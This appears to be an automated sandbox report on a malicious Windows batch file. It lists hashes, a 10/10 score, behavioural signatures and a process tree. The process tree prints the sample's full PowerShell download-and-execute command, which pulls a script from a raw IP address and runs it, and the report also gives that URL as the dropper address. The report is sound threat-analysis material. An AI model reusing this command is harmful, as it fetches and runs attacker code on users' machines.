Analysis
-
max time kernel
88s -
max time network
150s -
platform
windows10_x64 -
resource
win10 -
submitted
23-06-2020 03:10
Static task
static1
Behavioral task
behavioral1
Sample
ba14ab3ed6e7b7ab08b7add2a00958b9.bat
Resource
win7v200430
windows7_x64
0 signatures
0 seconds
Behavioral task
behavioral2
Sample
ba14ab3ed6e7b7ab08b7add2a00958b9.bat
Resource
win10
windows10_x64
0 signatures
0 seconds
General
-
Target
ba14ab3ed6e7b7ab08b7add2a00958b9.bat
-
Size
216B
-
MD5
be80d5e6a14a15ec34832dbba9abf139
-
SHA1
3f56abfb2adcb556bdabeac9b92de7520a81ccbf
-
SHA256
c21697f0b7e8c644cf9bc515972a1ec3b8c3c357c123dd8b06c1fa1f93e6b88b
-
SHA512
20f8041a4f2f000a47bb0f9fb7c4af1b8f4842c6706252ccc4abda665be8f7ae22b1a6d8385a19bc1d0f1e006ffb667334d127cbd70bf66a58e146b039dcd73d
Score
10/10
Malware Config
Extracted
Language
ps1
Source
URLs
ps1.dropper
http://185.103.242.78/pastes/ba14ab3ed6e7b7ab08b7add2a00958b9
Signatures
-
Suspicious use of WriteProcessMemory 3 IoCs
Processes:
cmd.exedescription pid process target process PID 3060 wrote to memory of 3888 3060 cmd.exe powershell.exe PID 3060 wrote to memory of 3888 3060 cmd.exe powershell.exe PID 3060 wrote to memory of 3888 3060 cmd.exe powershell.exe -
Program crash 1 IoCs
Processes:
WerFault.exepid pid_target process target process 3792 3888 WerFault.exe powershell.exe -
Suspicious use of AdjustPrivilegeToken 3 IoCs
Processes:
WerFault.exedescription pid process Token: SeRestorePrivilege 3792 WerFault.exe Token: SeBackupPrivilege 3792 WerFault.exe Token: SeDebugPrivilege 3792 WerFault.exe -
Suspicious behavior: EnumeratesProcesses 14 IoCs
Processes:
WerFault.exepid process 3792 WerFault.exe 3792 WerFault.exe 3792 WerFault.exe 3792 WerFault.exe 3792 WerFault.exe 3792 WerFault.exe 3792 WerFault.exe 3792 WerFault.exe 3792 WerFault.exe 3792 WerFault.exe 3792 WerFault.exe 3792 WerFault.exe 3792 WerFault.exe 3792 WerFault.exe
Processes
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\ba14ab3ed6e7b7ab08b7add2a00958b9.bat"1⤵
- Suspicious use of WriteProcessMemory
PID:3060 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeC:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "IEX (New-Object System.Net.WebClient).DownloadString('http://185.103.242.78/pastes/ba14ab3ed6e7b7ab08b7add2a00958b9');Invoke-PYHZVCNXW;Start-Sleep -s 10000"2⤵PID:3888
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3888 -s 7043⤵
- Program crash
- Suspicious use of AdjustPrivilegeToken
- Suspicious behavior: EnumeratesProcesses
PID:3792